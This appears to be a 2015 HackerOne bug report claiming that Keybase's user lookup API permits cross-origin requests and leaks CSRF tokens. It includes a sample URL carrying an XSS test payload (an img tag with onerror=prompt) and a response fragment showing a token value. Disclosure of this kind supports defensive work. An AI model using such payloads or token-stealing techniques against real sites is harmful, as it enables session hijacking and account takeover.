Keybase: Stealing CSRF Tokens

2015-07-20T20:20:11
ID H1:77065
Type hackerone
Reporter akhil-reni
Modified 2015-07-22T20:45:48

Description

hello

I See that you allow cross origin request in API, but you leak CSRF on every invalid request

Vulnerable URL:

https://keybase.io/_/api/1.0/user/lookup.json?usernames=test%22%3E%3Cimg%20src=x%20onerror=prompt%281%29%3E

Response

xyz.... "csrf_token":"lgHZIDVjN2RiOGNiZjNhZjkxYzRjYTgzMjI3MmJmY2Q1ZTA4zlWtVxXOAAFRgMDEIPn2lkhARPmRDF5dcdo+u+y+DyNuLvCZsk6wbWih8i8a"}

POC is attached.

Regards, Wesecureapp